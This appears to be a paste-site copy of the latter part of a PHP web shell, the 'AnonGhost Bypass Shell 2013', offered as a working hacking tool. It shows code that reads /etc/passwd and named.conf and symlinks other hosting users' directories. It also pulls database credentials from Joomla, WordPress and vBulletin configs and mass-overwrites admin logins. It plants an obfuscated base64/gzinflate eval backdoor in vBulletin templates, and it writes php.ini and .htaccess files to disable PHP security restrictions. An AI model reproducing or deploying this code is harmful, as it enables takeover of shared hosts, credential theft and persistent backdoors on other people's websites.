  808. " . $user['name'] . "
  809. </td></font>
  810.  
  811.  
  812.  
  813.  
  814.  
  815.  
  816. <td>
  817. <div class='cone'><a href='sim/rut/home/" . $user['name'] . "/public_html' target='_blank'>symlink </a></div>
  818. </td>
  819.  
  820.  
  821. </tr></div> ";
  822.                             flush();
  823.                             flush();
  824.                         }
  825.                     }
  826.                 }
  827.             }
  828.             echo "</table></div><br><br>";
  829.             break;
  830.         case 'ensim':
  831.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Enable Symlink</font></b><br><center><form method=post><br><br>
  832.            <input type=submit name=ens value="Bypass" /></form></center>';
  833.             error_reporting(0);
  834.             if (isset($_POST['ens'])) {
  835.                 mkdir('ensim', 0755);
  836.                 $rr = '<Directory "/home"> *** Options -ExecCGI* ***
  837. AllowOverride
  838. AuthConfig Indexes
  839. Limit FileInfo
  840. Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
  841. </ Directory>';
  842.                 $g = fopen('ensim/.htaccess', 'w');
  843.                 fwrite($g, $rr);
  844.                 echo "<br><br><font face='Tahoma' color='#009900' size='2pt'>Symlink Function Enabled Successfully check path</font></center>";
  845.                 echo "<center><br><b class='cone'><a href=ensim/ target='_blank'><font face='Tahoma' color='#ff0000' size='2pt'>Click here </font></a></b></center><br>";
  846.             }
  847.             break;
  848.         case 'file':
  849.             echo '
  850. <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Symlink Manual</font></b>
  851.  
  852. <br /><br />
  853. <form method="post">
  854. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  855. <input type="text" name="symfile" value="file name symlink .txt" size="60"/><br /><br />
  856. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  857.  
  858.  
  859.  
  860. </form>
  861. ';
  862.             $pfile = $_POST['file'];
  863.             $symfile = $_POST['symfile'];
  864.             $symlink = $_POST['symlink'];
  865.             if ($symlink) {
  866.                 @mkdir('simfel', 0777);
  867.                 $c = "Options Indexes FollowSymLinks
  868. DirectoryIndex ssssss.htm
  869. AddType txt .php
  870. AddHandler txt .php
  871.  AddType txt .html
  872. AddHandler txt .html
  873. Options all
  874. Options
  875. Allow from all
  876. Require None
  877. Satisfy Any";
  878.                 $f = @fopen('simfel/.htaccess', 'w');
  879.                 @fwrite($f, $c);
  880.                 @symlink("$pfile", "simfel/$symfile");
  881.                 echo '<br /><font face="Tahoma" color="#009900" size="3pt"><b>Done.. !</b><br></font><div class="cont" align="center"><font face="Tahoma" color="#009900" size="2pt">Open this file -> <a target="_blank" href="simfel/' . $symfile . '" >' . $symfile . '</a></font></div>';
  882.             }
  883.             break;
  884.         case 'read':
  885.             echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Read /etc/passwd</font></b>";
  886.             echo "<br /><br /><form method='post' action='?vw=read&save=1'><textarea cols='80' rows='15' name='file'>";
  887.             flush();
  888.             flush();
  889.             $file = '/etc/named.conf';
  890.             $w0co = @fopen($file, 'r');
  891.             if ($w0co) {
  892.                 $content = @fread($w0co, @filesize($file));
  893.                 echo "" . htmlentities($content) . "";
  894.             } else if (!$w0co) {
  895.                 $w0co = @show_source($file);
  896.             } else if (!$w0co) {
  897.                 $w0co = @highlight_file($file);
  898.             } else if (!$w0co) {
  899.                 $sm = @symlink($file, 'sym.txt');
  900.                 if ($sm) {
  901.                     $w0co = @fopen('sim/sym.txt', 'r');
  902.                     $content = @fread($w0co, @filesize($file));
  903.                     echo "" . htmlentities($content) . "";
  904.                 }
  905.             }
  906.             echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
  907.             if (isset($_GET['save'])) {
  908.                 $cont = stripcslashes($_POST['file']);
  909.                 $f = fopen('named.txt', 'w');
  910.                 $w = fwrite($f, $cont);
  911.                 if ($w) {
  912.                     echo '<br />save has been successfully';
  913.                 }
  914.                 fclose($f);
  915.             }
  916.             break;
  917.         case 'passwd':
  918.             echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Read /etc/passwd</font></b>';
  919.             if (isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0) {
  920.                 $cont = stripcslashes($_POST['file']);
  921.                 if (!file_exists('passwd.txt')) {
  922.                     $f = @fopen('passwd.txt', 'w');
  923.                     $w = @fwrite($f, $cont);
  924.                     fclose($f);
  925.                 }
  926.                 if ($w or @filesize('passwd.txt') > 0) {
  927.                     echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td></div>";
  928.                     flush();
  929.                     $fil3 = file('passwd.txt');
  930.                     foreach ($fil3 as $f) {
  931.                         $u = explode(':', $f);
  932.                         $user = $u['0'];
  933.                         echo "
  934. <tr>
  935.  
  936.  
  937.  
  938. <td width='15%'>
  939. $user
  940. </td>
  941.  
  942.  
  943.  
  944.  
  945.  
  946.  
  947. <td width='10%'><div class='cone'>
  948. <a href='sim/rut/home/$user/public_html' target='_blank'>Symlink </a></div>
  949. </td>
  950.  
  951. <td width='10%'><div class='cone'>
  952. <a href='$pageFTP/sim/rut/home/$user/public_html' target='_blank'>FTP</a></div>
  953. </td>
  954.  
  955.  
  956.  
  957. </tr></div> ";
  958.                         flush();
  959.                         flush();
  960.                     }
  961.                     die("</tr></div>");
  962.                 }
  963.             }
  964.             echo "<br /><br /><form method='post' action='?vw=passwd&save=1'><textarea cols='80' rows='15' name='file'>";
  965.             flush();
  966.             $file = '/etc/passwd';
  967.             $w0co = @fopen($file, 'r');
  968.             if ($w0co) {
  969.                 $content = @fread($w0co, @filesize($file));
  970.                 echo "" . htmlentities($content) . "";
  971.             } elseif (!$w0co) {
  972.                 $w0co = @show_source($file);
  973.             } elseif (!$w0co) {
  974.                 $w0co = @highlight_file($file);
  975.             } elseif (!$w0co) {
  976.                 for ($uid = 0;$uid < 1000;$uid++) {
  977.                     $ara = posix_getpwuid($uid);
  978.                     if (!empty($ara)) {
  979.                         while (list($key, $val) = each($ara)) {
  980.                             print "$val:";
  981.                         }
  982.                         print "
  983. ";
  984.                     }
  985.                 }
  986.             }
  987.             flush();
  988.             echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  989.             flush();
  990.             break;
  991.         case 'joomla':
  992.             if (isset($_POST['s'])) {
  993.                 $file = @file_get_contents('joomla.txt');
  994.                 $ex = explode("
  995. ", $file);
  996.                 echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Configs </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td></div>";
  997.                 flush();
  998.                 foreach ($ex as $exp) {
  999.                     $es = explode("||", $exp);
  1000.                     $config = $es[0];
  1001.                     $domin = $es[1];
  1002.                     $domins = trim($domin) . '';
  1003.                     $readconfig = @file_get_contents(trim($config));
  1004.                     if (ereg('JConfig', $readconfig)) {
  1005.                         $pass = ex($readconfig, '$password = \'', "';");
  1006.                         $userdb = ex($readconfig, '$user = \'', "';");
  1007.                         $db = ex($readconfig, '$db = \'', "';");
  1008.                         $fix = ex($readconfig, '$dbprefix = \'', "';");
  1009.                         $tab = $fix . 'users';
  1010.                         $con = @mysql_connect('localhost', $userdb, $pass);
  1011.                         $db = @mysql_select_db($db, $con);
  1012.                         $query = @mysql_query("UPDATE `$tab`  SET `username` ='virusa'");
  1013.                         $query3 = @mysql_query("UPDATE `$tab`  SET `password` ='0a3329119bf465dce95057a37ec91152:TL1fIDogLJU4bHHcgQWETu8GN67fUd8'");
  1014.                         if ($query and $query3) {
  1015.                             $r = '<b style="color: #006600">Succeed </b>user [virusa] pass [worm]</b>';
  1016.                         } else {
  1017.                             $r = '<b style="color:red">failed</b>';
  1018.                         }
  1019.                         $domins = trim($domin) . '';
  1020.                         echo "<tr>
  1021. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1022. <td><div class='cone'><a target='_blank' href='$config'>config</a></td><td>" . $r . "</td></div></tr>";
  1023.                         flush();
  1024.                     } else {
  1025.                         echo "<tr>
  1026. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1027. <td><div class='cone'><a target='_blank' href='http://$exp'>config</a></div></td><td><b style='color:red'>failed</b></td></tr>";
  1028.                         flush();
  1029.                     }
  1030.                 }
  1031.                 die();
  1032.             }
  1033.             if (!is_file('named.txt')) {
  1034.                 $d00m = @file("/etc/named.conf");
  1035.                 flush();
  1036.             } else {
  1037.                 $d00m = file("named.txt");
  1038.             }
  1039.             if (!$d00m) {
  1040.                 die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
  1041.             } else {
  1042.                 echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass Joomla</font></b><br><br><div class='tmp'>
  1043. <form method='POST' action='$pg?vw=joomla'>
  1044. <input type='submit' value='Mass change Admin' />
  1045. <input type='hidden' value='1' name='s' />
  1046. </form><br>
  1047. <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
  1048.                 $f = fopen('joomla.txt', 'w');
  1049.                 foreach ($d00m as $dom) {
  1050.                     if (eregi("zone", $dom)) {
  1051.                         preg_match_all('#zone "(.*)"#', $dom, $domvw);
  1052.                         if (strlen(trim($domvw[1][0])) > 2) {
  1053.                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
  1054.                             $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/configuration.php";
  1055.                             $wpp = get_headers($wpl);
  1056.                             $wp = $wpp[0];
  1057.                             $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/configuration.php";
  1058.                             $wpp2 = get_headers($wp2);
  1059.                             $wp12 = $wpp2[0];
  1060.                             $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/joomla/configuration.php";
  1061.                             $wpp3 = get_headers($wp3);
  1062.                             $wp13 = $wpp3[0];
  1063.                             $pos = strpos($wp, "200");
  1064.                             $config = "&nbsp;";
  1065.                             if (strpos($wp, "200") == true) {
  1066.                                 $config = $wpl;
  1067.                             } elseif (strpos($wp12, "200") == true) {
  1068.                                 $config = $wp2;
  1069.                             } elseif (strpos($wp13, "200") == true) {
  1070.                                 $config = $wp3;
  1071.                             } else {
  1072.                                 continue;
  1073.                             }
  1074.                             flush();
  1075.                             $dom = $domvw[1][0];
  1076.                             $w = fwrite($f, "$config||$dom
  1077. ");
  1078.                             if ($w) {
  1079.                                 $r = '<b style="color: #006600">Save</b>';
  1080.                             } else {
  1081.                                 $r = '<b style="color:red">failed</b>';
  1082.                             }
  1083.                             echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
  1084. <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
  1085.                             flush();
  1086.                         }
  1087.                     }
  1088.                 }
  1089.             }
  1090.             echo "</table></div><br><br>";
  1091.             break;
  1092.         case 'wp':
  1093.             if (isset($_POST['s'])) {
  1094.                 $file = @file_get_contents('wp.txt');
  1095.                 $ex = explode("
  1096. ", $file);
  1097.                 echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Configs </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td></div>";
  1098.                 flush();
  1099.                 flush();
  1100.                 foreach ($ex as $exp) {
  1101.                     $es = explode("||", $exp);
  1102.                     $config = $es[0];
  1103.                     $domin = $es[1];
  1104.                     $domins = trim($domin) . '';
  1105.                     $readconfig = @file_get_contents(trim($config));
  1106.                     if (ereg('wp-settings.php', $readconfig)) {
  1107.                         $pass = ex($readconfig, "define('DB_PASSWORD', '", "');");
  1108.                         $userdb = ex($readconfig, "define('DB_USER', '", "');");
  1109.                         $db = ex($readconfig, "define('DB_NAME', '", "');");
  1110.                         $fix = ex($readconfig, '$table_prefix  = \'', "';");
  1111.                         $tab = $fix . 'users';
  1112.                         $con = @mysql_connect('localhost', $userdb, $pass);
  1113.                         $db = @mysql_select_db($db, $con);
  1114.                         $query = @mysql_query("UPDATE `$tab` SET `user_login` ='virusa'") or die;
  1115.                         $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  1116.                         if ($query) {
  1117.                             $r = '<b style="color: #006600">Succeed </b>user [virusa] pass [1]</b>';
  1118.                         } else {
  1119.                             $r = '<b style="color:red">failed</b>';
  1120.                         }
  1121.                         $domins = trim($domin) . '';
  1122.                         echo "<tr>
  1123. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1124. <td><div class='cone'><a target='_blank' href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
  1125.                         flush();
  1126.                         flush();
  1127.                     } else {
  1128.                         echo "<tr>
  1129. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1130. <td><div class='cone'><a target='_blank' href='http://$config'>config</a></div></td><td><b style='color:red'>failed2</b></td></tr>";
  1131.                         flush();
  1132.                         flush();
  1133.                     }
  1134.                 }
  1135.                 die();
  1136.             }
  1137.             if (!is_file('named.txt')) {
  1138.                 $d00m = @file("/etc/named.conf");
  1139.             } else {
  1140.                 $d00m = @file("named.txt");
  1141.             }
  1142.             if (!$d00m) {
  1143.                 die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
  1144.             } else {
  1145.                 echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass WordPress</font></b><br><br><div class='tmp'>
  1146. <form method='POST' action='$pg?vw=wp'>
  1147. <input type='submit' value='Mass Change Admin' />
  1148. <input type='hidden' value='1' name='s' />
  1149. </form>
  1150. <br>
  1151. <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
  1152.                 flush();
  1153.                 flush();
  1154.                 $f = fopen('wp.txt', 'w');
  1155.                 foreach ($d00m as $dom) {
  1156.                     if (eregi("zone", $dom)) {
  1157.                         preg_match_all('#zone "(.*)"#', $dom, $domvw);
  1158.                         if (strlen(trim($domvw[1][0])) > 2) {
  1159.                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
  1160.                             $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp-config.php";
  1161.                             $wpp = get_headers($wpl);
  1162.                             $wp = $wpp[0];
  1163.                             $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/wp-config.php";
  1164.                             $wpp2 = get_headers($wp2);
  1165.                             $wp12 = $wpp2[0];
  1166.                             $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp/wp-config";
  1167.                             $wpp3 = get_headers($wp3);
  1168.                             $wp13 = $wpp3[0];
  1169.                             $pos = strpos($wp, "200");
  1170.                             $config = "&nbsp;";
  1171.                             if (strpos($wp, "200") == true) {
  1172.                                 $config = $wpl;
  1173.                             } elseif (strpos($wp12, "200") == true) {
  1174.                                 $config = $wp2;
  1175.                             } elseif (strpos($wp13, "200") == true) {
  1176.                                 $config = $wp3;
  1177.                             } else {
  1178.                                 continue;
  1179.                             }
  1180.                             flush();
  1181.                             $dom = $domvw[1][0];
  1182.                             $w = fwrite($f, "$config||$dom
  1183. ");
  1184.                             if ($w) {
  1185.                                 $r = '<b style="color: #006600">Save</b>';
  1186.                             } else {
  1187.                                 $r = '<b style="color:red">failed</b>';
  1188.                             }
  1189.                             echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
  1190. <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
  1191.                             flush();
  1192.                             flush();
  1193.                             flush();
  1194.                         }
  1195.                     }
  1196.                 }
  1197.             }
  1198.             echo "</table></div><br><br>";
  1199.             break;
  1200.         case 'vb':
  1201.             if (isset($_POST['s'])) {
  1202.                 $file = @file_get_contents('vb.txt');
  1203.                 $ex = explode("
  1204. ", $file);
  1205.                 echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b><font></td><td> <font color='#b3b3b3'><b>Configs </b><font></td><td> <font color='#b3b3b3'><b>Result </b><font></td></div>";
  1206.                 foreach ($ex as $exp) {
  1207.                     $es = explode("||", $exp);
  1208.                     $config = $es[0];
  1209.                     $domin = $es[1];
  1210.                     $domins = trim($domin) . '';
  1211.                     $readconfig = @file_get_contents(trim($config));
  1212.                     if (ereg('vBulletin', $readconfig)) {
  1213.                         $db = ex($readconfig, '$config[\'Database\'][\'dbname\'] = \'', "';");
  1214.                         $userdb = ex($readconfig, '$config[\'MasterServer\'][\'username\'] = \'', "';");
  1215.                         $pass = ex($readconfig, '$config[\'MasterServer\'][\'password\'] = \'', "';");
  1216.                         $con = @mysql_connect('localhost', $userdb, $pass);
  1217.                         $db = @mysql_select_db($db, $con);
  1218.                         $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==";
  1219.                         $crypt = "{\${eval(gzinflate(base64_decode(\'";
  1220.                         $crypt.= "$shell";
  1221.                         $crypt.= "\')))}}{\${exit()}}</textarea>";
  1222.                         $sqlfaq = "UPDATE template SET template ='" . $crypt . "' WHERE title ='FAQ'";
  1223.                         $query = @mysql_query($sqlfaq, $con);
  1224.                         if ($query) {
  1225.                             $r = '<b style="color: #006600">Succeed</b> shell in search.php';
  1226.                         } else {
  1227.                             $r = '<b style="color:red">failed</b>';
  1228.                         }
  1229.                         $domins = trim($domin) . '';
  1230.                         echo "<tr>
  1231. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1232. <td><div class='cone'><a target='_blank' href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
  1233.                     } else {
  1234.                         echo "<tr>
  1235. <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
  1236. <td><div class='cone'><a target='_blank' href='http://$config'>config</a></div></td><td><b style='color:red'>failed2</b></td></tr>";
  1237.                     }
  1238.                 }
  1239.                 die();
  1240.             }
  1241.             if (!is_file('named.txt')) {
  1242.                 $d00m = file("/etc/named.conf");
  1243.             } else {
  1244.                 $d00m = file("named.txt");
  1245.             }
  1246.             if (!$d00m) {
  1247.                 die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
  1248.             } else {
  1249.                 echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass vBulletin</font></b><br><br><div class='tmp'>
  1250. <form method='POST' action='$pg?vw=vb'>
  1251. <input type='submit' value='Inject shell' />
  1252. <input type='hidden' value='1' name='s' />
  1253. </form>
  1254. <br>
  1255. <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
  1256.                 $f = fopen('vb.txt', 'w');
  1257.                 foreach ($d00m as $dom) {
  1258.                     if (eregi("zone", $dom)) {
  1259.                         preg_match_all('#zone "(.*)"#', $dom, $domvw);
  1260.                         if (strlen(trim($domvw[1][0])) > 2) {
  1261.                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
  1262.                             ///////////////////////////////////////////////////////////////////////////////////
  1263.                             $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/includes/config.php";
  1264.                             $wpp = get_headers($wpl);
  1265.                             $wp = $wpp[0];
  1266.                             $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/vb/includes/config.php";
  1267.                             $wpp2 = get_headers($wp2);
  1268.                             $wp12 = $wpp2[0];
  1269.                             $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/forum/includes/config.php";
  1270.                             $wpp3 = get_headers($wp3);
  1271.                             $wp13 = $wpp3[0];
  1272.                             ////////// vb ////////////
  1273.                             $pos = strpos($wp, "200");
  1274.                             $config = "&nbsp;";
  1275.                             if (strpos($wp, "200") == true) {
  1276.                                 $config = $wpl;
  1277.                             } elseif (strpos($wp12, "200") == true) {
  1278.                                 $config = $wp2;
  1279.                             } elseif (strpos($wp13, "200") == true) {
  1280.                                 $config = $wp3;
  1281.                             } else {
  1282.                                 continue;
  1283.                             }
  1284.                             flush();
  1285.                             $dom = $domvw[1][0];
  1286.                             $w = fwrite($f, "$config||$dom
  1287. ");
  1288.                             if ($w) {
  1289.                                 $r = '<b style="color: #006600">Save</b>';
  1290.                             } else {
  1291.                                 $r = '<b style="color:red">failed</b>';
  1292.                             }
  1293.                             echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
  1294. <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
  1295.                             flush();
  1296.                         }
  1297.                     }
  1298.                 }
  1299.             }
  1300.             echo "</table></div><br><br>";
  1301.             break;
  1302.         case 'aplot':
  1303.             echo '
  1304. <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Uploader</font></b><br><br><center>';
  1305.             echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1306.             echo '<input type="file" name="file" value="Choose file" size="60" > <input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1307.             if ($_POST['_upl'] == "Upload") {
  1308.                 if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  1309.                     echo '<br /><br /><b>upload sukses.. <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif"><br><br>';
  1310.                 } else {
  1311.                     echo '<br /><br />aseeeemmm.., ora iso upload <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/24.gif"><br><br>';
  1312.                 }
  1313.             }
  1314.             break;
  1315.         case 'abot':
  1316.             echo '
  1317. <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Sekilas Info</font></b><br><br><br><br><center>
  1318. <center>
  1319.  ' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vYWdoX3pwczJmNGRkNjhiLmpwZyIgLz4=") . '
  1320. <br><br><font color="#006600" size="1pt">Coded by </font><font  color="#00aa00" size="1pt">Virusa Worm</font> <font color="#b0b000" size="1pt">-</font> <font color="#006600" size="1pt">Idea by </font><font color="#009900" size="1pt">Mauritania Attacker</font><br><br><br><br><font color="#00aa00" size="1pt">AnonGhost Bypass </font><font face="Tahoma" color="#b3b3b3" size="1pt">Shell 2013</font> <font color="#006600" size="1pt">include Several script which has recoded to make this shell.</font><br><br><font color="#006600" size="1pt">so.. try to figure it out if this shell not work in different server, and use ur brain.<br>learn to figure it out about something it\'s make be better. mbuh ngomong opo iki.. lol..<br>yen ono seng salah yo tulong dibenerke, tapi yen bener yo ojo disalahke.. kan iso sinau bareng.. wkkwk..<br><br><font color="#b0b000" size="1pt">"</font>tools not make hacker, but try to learn about tools. tried to find out why it\'s tool works. it\'s will be better than nothing.. <font color="#b0b000" size="1pt">"</font><br><br><br><font color="#006600" size="1pt">Special thankz to : </font><br><font color="#009900" size="1pt">My best Brother Mauritania Attacker<br><br><br><br><font color="#006600" size="1pt">thankz to : </font><br>
  1321. All Members AnonGhost Team - <font color="#006600" size="1pt">[ </font>Tanpa Bicara - Maniak k4Sur </font><font color="#006600" size="1pt">[pasangan galo.. lol..]]</font><br><br><font color="#006600" size="1pt">Greetz to :</font><br><font color="#b0b000" size="1pt">AnonGhost - Mauritania HaCker Team - X-Blackerz INC - ZHC - All Muslim Hackers </font></center><br><br>
  1322. ';
  1323.             break;
  1324.         case 'mati':
  1325.             if (@unlink(preg_replace('!\(\d+\)\s.*!', '', 'index.php'))) die('<br><br><b class="tmp"><font color="#ff0000" size="2pt">Shell has been Killed... gut bai..</font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
  1326.             else echo '<font color="#ff0000" size="2pt">unlink error!</font>';
  1327.             break;
  1328.         case 'metu':
  1329.             unset($_SESSION['login']);
  1330.             echo "<meta http-equiv='refresh' content='3; url=?" . $pwd . "' />";
  1331.             echo '<br><br><center><font color="#d0d000" size="2pt">Logout out.</font></center>';
  1332.             break;
  1333.         default:
  1334.             header("Location: $pg");
  1335.         }
  1336.     } else {
  1337.         if ($_POST['pateni'] == 'sikat') {
  1338.             @error_reporting(0);
  1339.             $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  1340.             $file = fopen("php.ini", "w+");
  1341.             $write = fwrite($file, base64_decode($phpini));
  1342.             fclose($file);
  1343.             $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  1344.             $file = fopen(".htaccess", "w+");
  1345.             $write = fwrite($file, base64_decode($htaccess));
  1346.             echo '<meta http-equiv="refresh" content="2; url=?' . $pwd . '" /><br><br><br><font face="Tahoma" color="#00bb00" size="3pt"><b>Bypassed !</b>';
  1347.             exit;
  1348.         }
  1349.         echo '
  1350. <br><center><font face="Tahoma" color="#006600" size="2pt"><b>Disable Function :
  1351. <form method="POST">
  1352. <input name="pateni" type="hidden" value="sikat">';
  1353.         if ('' == ($func = @ini_get('disable_functions'))) {
  1354.             echo "<font color=#00aa00>No Security for Function</font>";
  1355.         } else {
  1356.             echo '<font color=#d0d000>[ <blink>Please Bypass First!</blink> ]</font><br>';
  1357.             echo "<font color=red>$func</font>";
  1358.             echo '<br><br><input type="submit" value="Bypass Disable Function">';
  1359.         }
  1360.         echo '</b></font></center><br>';
  1361.         echo '<br><center>
  1362.  ' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vYWdoX3pwczJmNGRkNjhiLmpwZyIgLz4=") . '
  1363. <br><br><font face="Tahoma" color="#006600" size="1pt">Coded by </font><font face="Tahoma" color="#00bb00" size="1pt">Virusa Worm</font>  <font color="#b0b000" size="1pt">-</font> <font color="#006600" size="1pt">Idea by </font><font color="#009900" size="1pt">Mauritania Attacker</font><br><br><br><br><br><font color="#006600" size="1pt">Special thankz to : </font><br><font color="#009900" size="1pt">My best Brother Mauritania Attacker<br><br><br><br><font color="#006600" size="1pt">thankz to : </font><br>
  1364. All Members AnonGhost Team - <font color="#006600" size="1pt">[ </font>Tanpa Bicara - Maniak k4Sur </font><font color="#006600" size="1pt">[pasangan galo.. lol..]]</font><br><br><font color="#006600" size="1pt">Greetz to :</font><br><font color="#b0b000" size="1pt">AnonGhost - Mauritania HaCker Team - X-Blackerz INC - ZHC - All Muslim Hackers</font></center>';
  1365.     }
  1366.     function ex($text, $a, $b) {
  1367.         $explode = explode($a, $text);
  1368.         $explode = explode($b, $explode[1]);
  1369.         return $explode[0];
  1370.     }
  1371.     echo '</div>
  1372. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(21,21,21); text-align:center; border-top: 1px solid #009900; border-bottom: 1px solid #009900"><font color=#009900 size=1 face="Tahoma">' . base64_decode("JmNvcHk7IEFub25HaG9zdCBCeXBhc3MgU2hlbGwgMjAxMyAtIENvZGVkIGJ5IFZpcnVzYSBXb3Jt") . '</font></footer>
  1373. </body></html>';
  1374. ?>
Add Comment
Please, Sign In to add comment